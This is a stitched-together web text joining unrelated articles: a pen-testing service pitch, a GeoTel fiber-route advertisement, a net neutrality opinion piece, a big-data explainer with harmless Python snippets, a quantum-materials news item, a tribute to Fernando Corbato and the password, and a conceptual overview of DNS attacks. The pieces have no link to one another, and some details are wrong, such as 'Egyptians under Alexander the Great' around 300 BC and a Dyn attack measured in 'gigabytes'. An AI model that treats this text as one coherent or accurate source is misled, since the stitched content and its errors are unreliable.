After completing a pen test, a plan is created and security upgrades are implemented to remediate each threat or any vulnerabilities discovered during the test. Our team goes over the findings with customers to answer any questions about our findings so customers clearly understand all aspects of the reports, their risk rating, and the pathway to remediating their exposure.
Why Perform Penetration Testing
Penetration testing has become a widely adopted security practice by organizations. Whether tests are required by regulatory mandates or you’re undergoing changes in network infrastructure or policies, pen tests can help with the following:
- Provides evidence to support increased investments in security & technology
- Shows employees’ cybersecurity awareness level
- See real impact of risks and compromised end-points
- Ensure business continuity
- Reassure all stakeholders
Talk to an Expert
Our specialists are ready to tailor our security service solutions to fit the needs of your business objectives.
If you would like to learn more about penetration testing for your organization, simply fill out the form below and we will have one of our specialists contact you.
Carrier Fiber Routes and Network Maps Explained
One of the most pivotal points in modern society is the ability to connect to the world wide web. Without efficient connections, people are left without answers, without the ability to work, and without the ability to effectively entertain among other things. At the root of the internet is actually a route, a fiber route. Fiber routes and network maps help to connect the modern world.
What are Carrier Fiber Routes and Network Maps?
Fiber routes are the physical paths on which fiber optic cable is laid, connecting end users to telecommunications services. Carrier fiber routes specifically identify the unique carrier or telco provider that services that fiber optic cable. Carrier fiber or network maps are physical or digital representations of the current fiber network landscape. This information can be collected through a variety of methods, but it is essential that carriers be identifiable in these maps or data representations. This type of data is an allocated source of location-based information.
Location-Based Intelligence and Carrier Fiber
Location-Based Intelligence is the method of developing insights specifically derived from information about a location or multiple locations. When applied to telecom aspects such as carrier networks, fiber routes, fiber lit buildings, etc. it provides essential telecom data. When organizations adopt the practice of incorporating Location-Based Intelligence for carrier fiber routes it can assist with the following.
- Business Decisions
- Companywide Analysis
- Competitive Analysis
- Marketing Efforts
- Monitoring Tasks
- And More
To gain all the benefits associated with this data, users must know the options for accessing the information.
Locating Nationwide Network Information Online
There are a few methods for acquiring fiber routes and carrier networks online. Data users can research locations individually, but this method poses issues with incomplete information and no guarantee of updated data. Users can research carriers individually, but this method can also suffer from incomplete information and can be time-costly. The safest method for locating carrier fiber route data online is with a trusted data provider, such as GeoTel.
Locating Network Information by State
It can be intimidating if an organization or individual is seeking information on fiber routes and maps for a country, but also for an entire state. More and more organizations are seeking carrier fiber routes and carrier networks as new businesses emerge with an increase in tax incentives from the local government. As new areas develop on a statewide basis, data users need a better understanding of the fiber landscape now more than ever.
Knowing the fiber landscape, such as where the most reliable and lowest latency connections are located can provide a large advantage over your competition. Voice, video, and other types of telecommunications are essential aspects of business operations. “Knowing where carrier fiber routes are can offer businesses the connection they need to a secure and fast network. For example, [in Missouri] Blue Bird Network offers a network with reliable, scalable, and secure connections to data centers, wireless towers, other business locations, etc.” Some states, such as Texas, might pose greater challenges to finding fiber routes easily as if you were searching in a citywide radius.
Locating Network Information for Local Environments
For individuals seeking carrier fiber route information for a specific address or city block, the options for locating information can be somewhat simpler. Data users can physically visit locations on foot or survey remotely via drone. However, these options provide limited information. They do not provide the actual carrier fiber route or the carrier network map, but they do show the carriers in the area. For users seeking accurate and abundant information, the best course of action is to source the information from a trusted provider.
Benefits of Carrier Fiber Routes Data
Knowing the fiber landscape can benefit almost any industry. Carrier fiber route data “allows companies and organizations to view, analyze, and understand data in a way that reveals patterns, relationships, and trends.” Having fiber route and carrier network data provides users with location-based information and the impact this tool can have mentioned above.
The benefits of carrier routes data can include:
- Predictive Analytics
- Fraud Detection
- Informed Business Decisions
- Customer Segmentation and Analysis
- Competitive Analysis
- Product and Market Development
As discussed, acquiring carrier fiber route data and carrier network maps can be time-consuming and unreliable in some cases. Selecting a trusted data source is essential for organizations and users. GeoTel offers a reliable solution, while being in business for over 20 years. This company has proved that it can sustain itself as a reliable data option. GeoTel also offers the largest and most accurate telecom database available. By employing a Living Database, the company is able to provide real-time data statistics and updates. Contact GeoTel to access location-based information on carrier fiber routes and network maps today!
Written by: Valerie Stephen
Sometimes you don’t know what you have until it’s gone.
Consider, for example, net neutrality – the guiding principle of the internet since its beginning.
The intent of net neutrality is to keep the internet free and open for everyone. This means that in the U.S., we can share and access information without interference.
In 2015, in response to public pressure, the Federal Communications Commission (FCC) formally adopted net neutrality rules. Less than two years later, following the election of the new administration, the FCC voted to dismantle the net neutrality rules.
Under the net neutrality protections passed in 2015, Internet Service Providers (ISPs) are not permitted to block or otherwise hinder access to content. Specifically, they cannot speed up, slow down or block any content, applications or websites that you may want to use or visit.
Without the protections that net neutrality affords, it’s possible that companies like AT&T, Comcast and Verizon will decide to block or slow down online content.
One way they may do this is by establishing “fast lanes.” Fast lanes are essentially a system of paid prioritization in which an ISP charges certain companies an additional fee to carry their content.
For example, Verizon or Comcast could charge sites and services like YouTube or Netflix more in exchange for faster loading and streaming times. Online platforms that don’t (or can’t) pay would be relegated to “slow lanes.”
Consumers also could be charged additional fees to access certain types of streaming content such as sports or music on the fast lane. Of course, consumers will ultimately be on the hook for the cost of additional fees charged to platforms such as Netflix to use the fast lane.
Why we support net neutrality
Future Link is fully in favor of net neutrality. We believe that consumers who pay to be connected to the internet should not have the performance or cost of their service determined by the content they consume.
Net neutrality is crucial for small business owners, startups and entrepreneurs. They rely on the open internet to reach their customers. Without the protections of net neutrality, ISPs could charge businesses more for the fast lane. If they can’t afford it, they’ll be stuck in the slow lane.
To quote an analogy from a recent article at theguardian.com:
- Imagine they (private road owners) were allowed to charge companies different amounts to use them (roads), so that companies with enough cash could pay for exclusive use of fast lanes, leaving their smaller competitors consigned to lag behind on slow, badly maintained roads. Sounds outrageously anti-competitive, doesn’t it?
Want to learn more about net neutrality and what you can do to help restore its protections?
The answers you get to the question “What is big data?” will typically depend on the perspective of whomever you’re asking. During the late 1990s and early 2000s, when the term first came to prevalence, a quantitative definition of big data might have described it as any piece or set of information greater than a gigabyte (1 GB) in size. These days, that amount of information could comfortably sit on a memory chip the size of your thumbnail in an age where big data is reckoned in terms of petabytes, exabytes, and zettabytes of information.
A more subjective definition might describe it in terms of the huge volume of information being continuously generated by people, technology, and transactions, the velocity with which it’s appearing (along with the speed with which it needs to be processed and analyzed), and the vast variety of sources that contribute to it.
Looking at big data from a qualitative perspective – and taking into account that structured, unstructured, and semi-structured information sources contribute to the world’s data store – it’s possible to define big data as information that’s so extensive, vast, or complex that it’s difficult or impossible to process using traditional methods and technology.
Volume relates to the sheer size of the data sets involved. With information coming from business transactions, smart devices (IoT or Internet of Things), industrial equipment, videos, social media, and other streams, it’s now commonplace to measure big data in terms of petabytes (1,024 terabytes) or exabytes (1,024 petabytes) of information and even larger denominations, running to billions or even trillions of records.
Velocity refers both to the rate at which new information is being generated and to the speed desired or necessary for it to be processed for timely and relevant insights to become available. With mission-critical data coming from RFID (Radio Frequency Identification) tags, connected sensors, smart meters, and the like, the velocity of processing and analysis of big data often needs to be real-time.
Variety is an indication of the multitude and diversity of information sources that make up big data. This runs the gamut from numerical data in traditional databases, through multimedia streams of audio and video, to financial transactions, text documents, emails, and metadata (information about information).
At a more fundamental level, it may be characterized in terms of being structured, semi-structured, or unstructured.
Structured data takes a standard format capable of representation as entries in a table of columns and rows. This kind of information requires little or no preparation before processing and includes quantitative data like age, contact names, addresses, and debit or credit card numbers.
Unstructured data is more difficult to quantify and generally needs to be translated into some form of structured data for applications to understand and extract meaning from it. This typically involves methods like text parsing, natural language processing, and developing content hierarchies via taxonomy. Audio and video streams are common examples.
Semi-structured data falls somewhere between the two extremes and often consists of unstructured data with metadata attached to it, such as timestamps, location, device IDs, or email addresses.
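The distinction is easiest to see side by side. The records below are invented examples: a table-ready row, a sensor reading whose metadata gives it partial structure, and a raw text snippet that needs a parsing step before it yields anything structured:

```python
# Structured: fits a fixed table of columns and rows.
structured_row = {"customer_id": 1001, "age": 34, "city": "Denver"}

# Semi-structured: free-form content plus machine-readable metadata.
semi_structured = {
    "device_id": "sensor-17",
    "timestamp": "2022-06-01T08:30:00Z",
    "payload": "vibration spike detected on axis 2",
}

# Unstructured: raw text that must be parsed before analysis; a naive keyword
# pass is used here to impose a little structure on it.
email_body = "Hi team, the shipment to Denver is delayed until Friday."
keywords = [w.strip(",.").lower() for w in email_body.split() if w[0].isupper()]
print(keywords)   # ['hi', 'denver', 'friday']
```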
Besides these big data characteristics described, data analysts also need to consider the ingestion (taking in), harmonization (cleaning and balancing), analysis, visualization, and democratization (making readily available to all relevant stakeholders) of data sources, and the results of big data analysis.
Information is an integral component of our daily lives. From the answers we get to our queries and searches online, to the databases underlying the operations of the essential services and businesses we deal with, to the algorithms helping to regulate our transport, social media, and the delivery of utilities.
In all cases, data management helps to move big data efficiently to where it’s needed. Data analytics enables scientists to build statistical models and visualizations to help make sense of it, and domain knowledge provides the expertise to interpret the results from data analysis.
The impact of big data on society may be assessed in terms of the numerous areas where it affects communities, economies, and the environment: weather prediction, forecasting natural disasters, urban and community planning, traffic management, logistics, and healthcare are just some of the areas that determine why big data is important.
The importance of big data to commercial organizations is now synonymous with the importance of business analytics. The science of collecting and analyzing business intelligence (BI) and other relevant information to extract insights that can inform decision-making processes, boost operational and cost efficiencies, create a better understanding of markets and consumers, and ultimately boost the bottom line.
Organizations that have figured out how to implement data analytics successfully follow a number of best practices, including:
Though the term has been part of our general vocabulary since at least 2005, when Roger Mougalas from O’Reilly Media coined it (other sources credit John R. Mashey of Silicon Graphics, in the early 1990s), the history of big data actually has its roots in antiquity. For example, around 300 BC, the ancient Egyptians under Alexander the Great tried to capture all existing stores of information in the library of Alexandria. Later, military scientists of the Roman Empire would analyze field statistics to determine the optimal distribution for their armies.
Both were attempts to aggregate and organize huge repositories of information relevant to the business of the day so that experts and scholars could analyze this data and apply it for practical purposes.
In the modern era, the evolution of big data can be roughly subdivided into three main phases.
During Phase One, emerging database management systems (DBMS) gave rise to data warehousing and the first generation of data analytics applications, which employed techniques such as database queries, online analytical processing, and standard reporting tools. This first phase of big data was heavily reliant on the kind of storage, extraction, and optimization techniques that are common to Relational Database Management Systems (RDBMS).
Phase Two began in the early 2000s, fueled by the data collection and data analysis opportunities offered by the evolving internet and World Wide Web. HTTP-based web traffic generated a massive increase in semi-structured and unstructured data, requiring organizations to find new approaches and storage solutions to deal with these new information types to analyze them effectively. Companies like Yahoo, Amazon, and eBay started to draw insights from customer behavior by analyzing click-rates, IP-specific location data, and search logs. Meanwhile, the proliferation of social media platforms presented new challenges to the extraction and analysis of their unique forms of unstructured data.
Phase Three of big data is being largely driven by the spread of mobile and connected technologies. Behavioral and biometric data, together with location-based information sources such as GPS and movement tracking, are opening up new possibilities and creating fresh challenges for effective data gathering, analysis, and usage. At the same time, the sensor-based and internet-enabled devices and components of the Internet of Things (IoT) are generating zettabytes of data every day, and fueling innovations in the race to extract meaningful and valuable information from these new data sources.
In addition to the more commonly known 3 “Vs” of big data (Volume, Velocity, Variety) there are an additional 4 “Vs” that are equally as important (Variability, Veracity, Visualization, Value). The seven “Vs” summarize the concepts underlying the immense amounts of information that organizations now routinely have to deal with and illustrate why it’s necessary to capture, store, and analyze this complex resource. They are:
Volume: The amount of data available. Once expressed in megabytes (MB) or gigabytes (GB), big data volume is now typically measured in petabytes (PB), zettabytes (ZB), or even yottabytes (YB) of information. The Internet of Things (IoT) is now contributing immense amounts of data through connected technologies and smart sensors, and the volume of data in the world is projected to double every two years.
Velocity: The speed with which data becomes accessible can mean the difference between success and failure. In today’s economy, data velocity has to be as close to real-time as possible to fuel analytics and instantaneous or near-instantaneous responses to market conditions.
Variety: Big data consists of structured, semi-structured, and unstructured information, with the latter category, including diverse sources such as audio, video, and SMS text messages. It’s estimated that 90% of today’s information is generated in an unstructured manner – and these different kinds of data require different types of analysis.
Variability: Differences in perception and relevance can give the same data set a different meaning when viewed from different perspectives. This variability requires big data algorithms to understand the context and decode the exact meaning of every record in its specific environment.
Veracity: This refers to the reliability and accuracy of the information available. Besides allowing for greater utilization due to their higher quality, data sets with high veracity are particularly important to organizations whose business centers on information interpretation, usage, and analysis.
Visualization: Any data that’s collected and analyzed has to be understandable and easy to read if it’s to be of any use to all stakeholders in an organization. Visualization of data through charts, graphs, and other media makes information more accessible and comprehensible.
Value: This is a measure of the return resulting from data management or analysis. Handling big data requires a considerable investment in time, energy, and resources – but if it’s done properly, the resulting value can yield considerable profit and competitive advantages for the enterprise.
Examples of data usage in the media and entertainment industries abound – ranging from the digitization and repackaging of content for different platforms, to the collection and analysis of viewing figures, audience behavior characteristics, and feedback, to informing decisions concerning program content, scheduling, and promotion. Big data is contributing to a media and entertainment market that analysts predict will generate an estimated $2.2 trillion in revenue in 2021.
Predictive analytics and demand forecasting are data analytics examples that enable Amazon and other retailers to accurately predict what consumers are likely to purchase in the future, based on indicators from their past buying behavior, market fluctuations, and other factors. For instance, retailers like Walmart and Walgreens regularly analyze changes in the weather to detect patterns in product demand.
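A drastically simplified sketch of that kind of forecast is shown below, with invented sales figures and weights; real demand models use far richer inputs such as seasonality, promotions, and, as noted above, the weather:

```python
# Predict next week's demand as a weighted average of recent weeks, with the
# most recent weeks weighted most heavily (all numbers are illustrative).
weekly_units = [120, 135, 128, 150, 161, 158]   # oldest week first
weights      = [0.10, 0.10, 0.15, 0.15, 0.20, 0.30]

forecast = sum(units * w for units, w in zip(weekly_units, weights))
print(round(forecast))   # ~147 units expected next week
```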
These big data examples rely on drawing inferences from past and current observations to predict or prescribe courses of action for the future. But some examples of big data usage are rooted very much in the management of ongoing events. In product recalls, for example, the data helps retailers and manufacturers identify who purchased a product, and allows them to reach out to the affected parties.
Diagnostics, predictive medicine, and population health management are some of the big data examples in healthcare. Expansive databases and data analytics tools are empowering healthcare institutions to provide better clinical support, at-risk patient population management, and cost-of-care measurement. Insights from analytics can enable care providers to pinpoint how variations among patients and treatments will influence health outcomes.
With the cost of genome sequencing coming down, analysis of genomics data is enabling healthcare providers to more accurately predict how illnesses like cancer will progress. At the institutional level, some big data systems are able to collect information from revenue cycle software and billing systems to aggregate cost-related data and identify areas for cost reduction.
Examples of big data in computer applications include the “maps to apps” approach that’s transforming the nature of transportation planning and navigation. Big data collected from government agencies, satellite images, traffic patterns, agents, and other sources can be incorporated into software and platforms that put the latest travel information in the palm of your hand, as mobile apps and portals.
General Electric’s Flight Efficiency Services, recently adopted by Southwest Airlines and used by other airlines worldwide, is a big data example that’s assisting air carriers in optimizing their fuel usage and planning for safety by analyzing the massive volumes of data that airplanes generate.
Big data analytics examples extend to all sectors of the economy. Skupos, a PC-based platform that pulls transaction data from 7,000 convenience stores nationwide, is an example of big data at work in the retail industry. Each year, billions of transactions studied using the platform’s business analytics tools are made available to store owners, enabling them to determine location-by-location bestsellers and set up predictive ordering.
The Salesforce customer relationship management (CRM) platform integrates data from various aspects of a business, such as marketing, sales, and services, pulling the information into a comprehensive, single-screen overview. The platform’s Einstein Analytics feature automatically provides insights and predictions on metrics like sales and customer churn, using Artificial Intelligence. Salesforce is one of the big data marketing examples which enables users to connect and integrate with outside data management tools.
A number of big data concepts surround the treatment and analysis of the diverse range of structured, semi-structured, and unstructured information sources contributing to the estimated 1.7 MB of data created by each person on the planet in each second of 2020.
All data must go through a process called extract, transform, load (ETL) before it can be analyzed. Here, data is harvested, formatted to make it readable by an application, then stored for use. The ETL process varies for each type of data.
For structured data, the ETL process stores the finished product in a data warehouse, whose database applications are highly structured and filtered for specific analytics purposes. In the case of unstructured data, the raw format of the data and all of the information it holds are preserved in data lakes.
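To make the ETL flow concrete, here is a minimal, hypothetical sketch in Python: the CSV source, the field names, and the SQLite "warehouse" are illustrative stand-ins, not a reference to any particular product.

```python
import csv
import sqlite3

# Extract: read raw rows from a (hypothetical) CSV export.
def extract(path):
    with open(path, newline="") as f:
        yield from csv.DictReader(f)

# Transform: normalize types and discard records that fail basic checks.
def transform(rows):
    for row in rows:
        try:
            yield (row["order_id"], row["region"].strip().lower(), float(row["amount"]))
        except (KeyError, ValueError):
            continue  # skip malformed records

# Load: write the cleaned rows into a small SQLite "warehouse" table.
def load(records, db_path="warehouse.db"):
    con = sqlite3.connect(db_path)
    con.execute("CREATE TABLE IF NOT EXISTS orders (order_id TEXT, region TEXT, amount REAL)")
    con.executemany("INSERT INTO orders VALUES (?, ?, ?)", records)
    con.commit()
    con.close()

if __name__ == "__main__":
    load(transform(extract("orders.csv")))
```

A real pipeline would add logging, error reporting, and incremental loads, but the extract–transform–load shape stays the same.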
Since the compute, storage, and networking requirements for working with large data sets are beyond the limits of a single computer, big data tools must process information through clusters of computers in a distributed manner. Products like Hadoop are built with extensive networks of data clusters and servers, allowing big data to be stored and analyzed on a massive scale.
Particularly when dealing with unstructured and semi-structured information, the “What is big data?” concept must also take context into account. So, for example, if a query on an unstructured data set yields the number 31, some form of context must be applied to determine whether this is the number of days in a month, an identification tag, or the number of items sold this morning. Merging internal data with external context makes it more meaningful and leads to more accurate data modeling and analysis.
As we’ve already observed, there are three main types of big data: structured, semi-structured, and unstructured.
Structured data is highly organized and easy to define and work with, having dimensions that are defined by set parameters. This is the kind of information that can be represented by spreadsheets or tabular relational database management systems having rows and columns.
Structured data follows schemas, which define the conditions and paths leading to specific data points. For example, the schema for a payroll database will lay out employee identification information, pay rates, number of hours worked, and how payment is delivered. The schema defines each one of these dimensions for whatever application is using the database.
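As an illustration of such a schema, the snippet below declares a simple payroll table; the table and column names are hypothetical, not drawn from any specific system.

```python
import sqlite3

con = sqlite3.connect("payroll.db")
con.execute("""
CREATE TABLE IF NOT EXISTS payroll (
    employee_id     INTEGER PRIMARY KEY,   -- employee identification
    full_name       TEXT NOT NULL,
    hourly_rate     REAL NOT NULL,         -- pay rate
    hours_worked    REAL NOT NULL,
    payment_method  TEXT CHECK (payment_method IN ('direct_deposit', 'check'))
)
""")
con.commit()
con.close()
```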
It’s reckoned that no more than 20% of all data is structured.
Unstructured data is more free-form and less quantifiable, like the kind of information contained in emails, videos, and text documents. More sophisticated techniques must be applied to this type of big data before systems and analysts can extract useful insights from it. This often involves translating it into some form of structured data.
Unstructured data that’s associated with metadata (information about information, such as timestamps or device IDs) is known as semi-structured. Often, while the actual content of the big data (the characters making up an email message, or the pixels in an image, for example) is not structured, there are components that allow the data to be grouped, based on certain characteristics.
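A small, hypothetical example of a semi-structured record: the message body is unstructured free text, while the surrounding metadata fields allow the record to be grouped and filtered.

```python
import json

# Semi-structured record: free-text payload wrapped in queryable metadata.
email_record = {
    "device_id": "mail-gw-07",            # metadata: which system produced it
    "timestamp": "2020-03-15T09:42:10Z",  # metadata: when it was captured
    "sender_domain": "example.com",       # metadata: groupable attribute
    "body": "Hi team, attached are the Q1 figures we discussed...",  # unstructured
}

print(json.dumps(email_record, indent=2))
```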
Among the principal benefits of big data for organizations is its potential to improve operational efficiency and reduce costs. This may be due to analytical techniques which identify ways of streamlining or optimizing processes, or predictive or prescriptive analysis that reveals possible problems in time to mitigate or avoid them entirely, or plots courses of action that aid decision-makers in improving business methods and operations.
For commercial organizations, big data analytics using AI and machine learning technologies aids in understanding consumers, improving fulfillment options for product and service delivery, and in crafting and maintaining personalized customer experiences across multiple platforms. These methods help organizations bolster their sales and marketing operations, customer acquisition, and customer retention.
As well as identifying potential risks to the enterprise, big data analytics also provides an avenue for innovation by establishing opportunities to develop new products and services to fill existing gaps or niches in the market.
Other big data benefits include supply chain optimization, with data analytics making high-level collaboration between the members of a supplier network possible. This can not only lead to improved logistics and distribution but also open opportunities for innovation and joint ventures between stakeholders in the supply chain.
Automation is expected to play a huge role in the future of data analytics, with intelligent and pre-programmed solutions enabling organizations to streamline and simplify the analytics process. Augmented analytics will be one of the facilitating mechanisms for this by integrating machine learning and natural language processing into data analytics and business intelligence.
Augmented analytics can scrub raw data to identify valuable records for analysis, automating certain parts of the process and making the data preparation process easier for data scientists, who habitually spend around 80% of their time cleaning and preparing data for analysis using traditional methods. This will free up more time for data scientists to spend on strategic tasks and special projects.
Relationship analytics is also set to play a part in the big data future by empowering organizations to make connections between disparate data sources that would appear to have no common ground on the surface. Relationship analytics uses several techniques to transform data collection and analysis methods, allowing businesses to optimize several functions at once.
By bringing together social science, managerial science, and data science into a single field, decision intelligence will put a more human spin on the future of business analytics by using social science to understand the relationships between variables better. Decision intelligence draws from different disciplines such as business, economics, sociology, neuropsychology, and education to optimize the decision-making process.
As IoT devices become more widespread in critical applications, data analysts will expect platforms to generate insights in as close to real-time as possible. Continuous analytics will help accomplish this by studying streaming data, shortening the window for data capture and analysis. By combining big data development, DevOps, and continuous integration, this methodology also provides proactive alerts to end-users or continuous real-time updates.
Machine learning technology is facilitating the augmentation and streamlining of data profiling, modeling, enrichment, data cataloging, and metadata development, making data preparation processes more flexible. This augmented data preparation and discovery automatically adapts to fresh data, especially outlier variables, and augmented discovery machine learning algorithms allow data analysts to visualize and narrate their findings more easily.
Predictive and prescriptive analytics are charting a course for the future of big data, in which organizations will be able to improve efficiencies and optimize performance by providing information not only on what will happen in a particular circumstance, but how it could happen better if you perform actions X, Y, or Z. In this field, AI and machine learning are already automating processes to assist businesses with guided marketing, guided selling, and guided pricing.
Looking at the future of data itself, the majority of big data experts agree that the amount of information available will continue to grow exponentially, with some estimates predicting that the global data store will reach 175 zettabytes by 2025. This will be largely due to increasing numbers of transactions and interactions on the internet, and the proliferation of connected technologies.
In response to this, organizations are expected to migrate more of their big data load to the cloud, in mainly hybrid or multi-cloud deployments. As legislative frameworks continue to evolve and adapt to changing circumstances, data privacy and governance will remain high on the agenda for both governments and individual citizens.
The growing big data landscape will also require solutions to the ongoing skills shortage, which is increasing the demand for data scientists, artificial intelligence engineers, Chief Data Officers (CDOs), and other professionals with the relevant skills for managing and manipulating big data.
Big data is huge volumes of information whose scale and complexity make it possible to manage and analyze only with specialist techniques and technology. Data sets can run to petabytes or more in size.
A Surprising Quantum Effect Observed In a “Large” Object
While working on the resistivity of a type of delafossite – PdCoO2 – researchers at EPFL’s Laboratory of Quantum Materials discovered that the electrons in their sample did not behave entirely as expected. When a magnetic field was applied, the electrons retained signatures of their wave-like nature, which could be observed even at relatively high temperatures and over relatively large length scales. These surprising results, obtained in collaboration with several research institutions, could prove useful, for example, in the quest for quantum computing.
“It’s the very first time this quantum effect has been observed in such a large piece of metal,” said Philip Moll, who heads EPFL’s Laboratory of Quantum Materials. “12 micrometers may seem small, but for the dimensions of an atom, it is gigantic. This is the length scale of biological life, such as algae and bacteria.”
The next step will be to try and better understand how this phenomenon is possible at this scale. But researchers are already imagining a wealth of possibilities, particularly in the field of quantum computing.
Massachusetts Institute of Technology (MIT) announced that Fernando Corbato, a pioneer in computer security, has passed away aged 93.
Corbato’s death, though it is sad news, provides an opportunity to reflect on the importance of his work, and specifically on one of his revolutionary ideas: the password.
That’s right, he invented the password. While managing and remembering passwords has evolved from scribbling on scraps of paper to selecting from among the best password manager software on the market at any given time, the idea is so common that it seems incredible that anyone would have to invent it. But every technology has to start somewhere and the humble password, now used for everything from your email account to cloud security, started at MIT in the 1950s.
Securing multi-user systems
Dr. Corbato spent his entire career at MIT. He originally joined the physics department to study for a doctorate in condensed matter physics, but (luckily for us) soon got distracted by the machines he was using to perform his calculations.
The faculty at MIT was already using computers by 1950, but they were labor-intensive devices. This was partly because the monolithic machines could only work on one problem at a time. This meant that there was always a huge queue of jobs waiting to be processed, and a lot of processing time was lost.
Dr. Corbato’s solution was to develop an operating system called the Compatible Time-Sharing System (CTSS). This allowed large processing tasks to be broken into smaller components, and for the computer to give small slices of time to each task.
Even with the primitive computers that Dr. Corbato was working on in the 1950s, computations were so fast that none of the researchers would realize that they were only using a portion of the available processing time.
CTSS did create a problem, though. With multiple users sharing one computer, files had to be assigned to individual researchers, and available only to them. This was what led Dr. Corbato to develop the password system. In a system now familiar to everyone, every user was given a unique name and password, and their files stored in a way that they were available only to one user.
“Putting a password on for each individual user as a lock seemed like a very straightforward solution,” Dr. Corbato told Wired during an interview in 2012.
The rise of the password
CTSS was a groundbreaking advance, and it didn’t take long before the system had a huge influence. It led directly to the development (also at MIT) of Multics, another multi-user system that relied on passwords to secure files. Multics, in turn, inspired Unix, the forerunner of the Linux operating systems that are common today.
The influence of Corbato’s work was such that the password system was quickly adopted in almost every field of computer design. When the World Wide Web was invented at CERN, for instance, it seemed completely natural to use passwords to grant researchers access to computing resources. After the development of the PC in the 1980s, the password became an important part of business life, and eventually everyday life.
Today, though, some are questioning whether the password is really the best way of protecting personal data in our interconnected world. Though the concept itself is sound, there is a huge problem with the way that we use it: too many people use simple, short passwords that are easy to guess. Initiatives such as World Password Day have sought to raise awareness of this, but the problem remains.
Are passwords obsolete?
These problems have led to the development of systems that don’t rely on passwords in order to secure user data. Fingerprint, face recognition and other biometrics are slowly becoming common, even in consumer devices. But the truth is that the password is not likely to disappear any time soon.
The reason is simple: advanced technologies like face and fingerprint recognition are currently too expensive to implement on everyday systems and come with their own host of issues, too. Though certain high-value systems (like Internet banking or corporate intranets) have not relied on passwords for years, it’s unlikely that you’ll need a fingerprint to log into your WordPress account for some years to come. That’s not to say, though, that you shouldn’t secure your WordPress site as much as you can and check regularly for breaches and other infiltrations of your data.
One of the biggest problems with people and their passwords is that they use the same one for, say, their Pinterest account and their Internet banking. That’s a really bad idea – if one is hacked the other is compromised as well. Not surprisingly, password ‘crossover’ was one of the leading causes of damaged brand reputation in 2019.
So while we’ll have to accept that passwords are still with us for a while, we can also improve the way we work with them thanks to password management software innovations. The aforementioned password managers help you generate long, secure, unique passwords for every site (and account) you have, and keep track of all of them for you. There are many password managers that can help you create secure passwords for each account.
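For illustration, the short sketch below uses Python's standard library to generate a long, random, unique password for each account; it is a minimal example of the principle, not a substitute for a full password manager.

```python
import secrets
import string

def generate_password(length=20):
    # Draw from letters, digits, and punctuation using a cryptographically
    # secure random source (the `secrets` module).
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

# One unique password per site -- never reused across accounts.
for site in ("email", "banking", "social"):
    print(site, generate_password())
```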
It’s important to choose a password manager that fits your needs. Perhaps you prefer to use your desktop for online accounts, then it is important to choose a manager that offers a desktop app, like Dashlane, or perhaps you are looking to also pair it with secure file storage. Whatever your needs, be sure to review each password manager’s features to choose the best one for your situation.
Tech companies are also seeking to improve the security of passwords through new standards like FIDO2, which builds on existing technology rather than trying to re-invent the wheel.
The bottom line
Looking back at the past 70 years, it’s tempting to say that the work of Dr. Corbato has been too influential. Here’s why. Though the password has helped to keep all of our IT systems secure over that time, it’s now such a common feature of everyday life that we forget how important passwords are in keeping us safe online. It can sometimes feel like we need a password for everything, and that’s why we sometimes get lazy, and use short passwords, or re-use the same password for multiple systems.
Not that this is Dr. Corbato’s fault, of course. His invention has been the most reliable way to keep data safe since the 1950s, and will no doubt form the basis for whatever comes next. As Prof Fadel Adib, from the Media Lab at MIT, said in his tribute, “our world would be very different without his research and that of his descendants. He inspires in his work and his legacy.”
The Domain Name System (DNS) is too important to do without, but it’s difficult to defend. This makes DNS services an excellent target for attack. Taking out an organization’s DNS service renders it unreachable to the rest of the world except by IP address. If "f5.com" failed to be published online, every single Internet site and service we ran would be invisible. This means web servers, VPNs, mail services—everything.
Even worse, if hackers could change the DNS records, they could then redirect everyone to sites they controlled. Since DNS is built upon cooperation between millions of servers and clients over insecure and unreliable protocols, it is uniquely vulnerable to disruption, subversion, and hijacking. Here’s a quick rundown of the known major DNS attacks.
Denial of Service
Denial-of-service attacks are not limited to DNS, but taking out DNS decapitates an organization. Why bother flooding thousands of web sites when killing a single service does it all for you? The most famous DoS attacks against DNS are the recent Dyn DDoS attacks, which blared more than 40 gigabytes of noise at Dyn’s DNS services. Dyn was running DNS services for many major organizations, so when they were drowned by a flood of illegitimate packets, so were companies like Amazon, Reddit, FiveThirtyEight, and Visa.
DNS can also be subverted for use as a denial-of-service weapon against other sites by way of DNS amplification/reflection. This works because DNS almost always returns a larger set of data than the query that requested it. Since DNS runs over UDP, it’s a simple matter for attackers to craft fake packets spoofing a query source: if they can fake thousands of queries that appear to come from the victim’s IP address, the amplified responses will overwhelm the victim.
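The arithmetic behind amplification is straightforward; the byte counts below are illustrative assumptions rather than measurements of any particular resolver.

```python
# Illustrative sizes: a small spoofed query can elicit a much larger response.
query_size_bytes = 60        # typical small UDP DNS query (assumed)
response_size_bytes = 3000   # large response, e.g. an ANY answer (assumed)

amplification_factor = response_size_bytes / query_size_bytes
print(f"Amplification factor: {amplification_factor:.0f}x")

# A modest botnet sending 10,000 such queries per second, all spoofed to
# appear to come from the victim, reflects roughly this much traffic:
queries_per_second = 10_000
print(f"{queries_per_second * response_size_bytes / 1e6:.0f} MB/s at the victim")
```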
Who owns what domain name, and what DNS servers are designated to answer queries are both managed by Domain Registrars. These are commercial services, such as GoDaddy, eNom, and Network Solutions Inc., where there are registered accounts controlling pointers to DNS servers. If attackers can hack those accounts, they can repoint a domain to a DNS server they control. This is how a Brazilian Internet banking site was completely taken over for hours.
DNS Server Vulnerabilities
Because DNS services are software, they can contain bugs that attackers can exploit. Luckily, DNS is old (so we’ve had time to find most of the bugs) and simple (so bugs are easy to spot), but problems have cropped up. In 2015, there was a rather significant hole found in BIND, an open-source DNS server running much of the Internet. Called CVE-2015-5477 (no cute name, thank you), BIND allowed an attacker to crash a DNS server with a single crafted query.
Another software vulnerability in DNS servers is recursive DNS cache poisoning (spoofing), in which an attacker can temporarily change DNS database entries by issuing specifically crafted queries.
Unauthorized DNS Changes
If you’ve got a server, someone must manage it. That means that you are dependent on how strongly you are authenticating the admins to that server, as well as ensuring the trustworthiness and competence of those admins. Because of the nature of DNS records, changes to DNS are cached by query clients; bad entries can sometimes take hours or days to unwind across the Internet.
DNS Data Leakage
You can’t run an unauthenticated Internet database full of important information without the occasional risk of leaking out something important. Attackers will query DNS servers looking for interesting Internet services that may not be widely known. DNS records can also aid phishing expeditions by using known server names in their phony baloney emails.
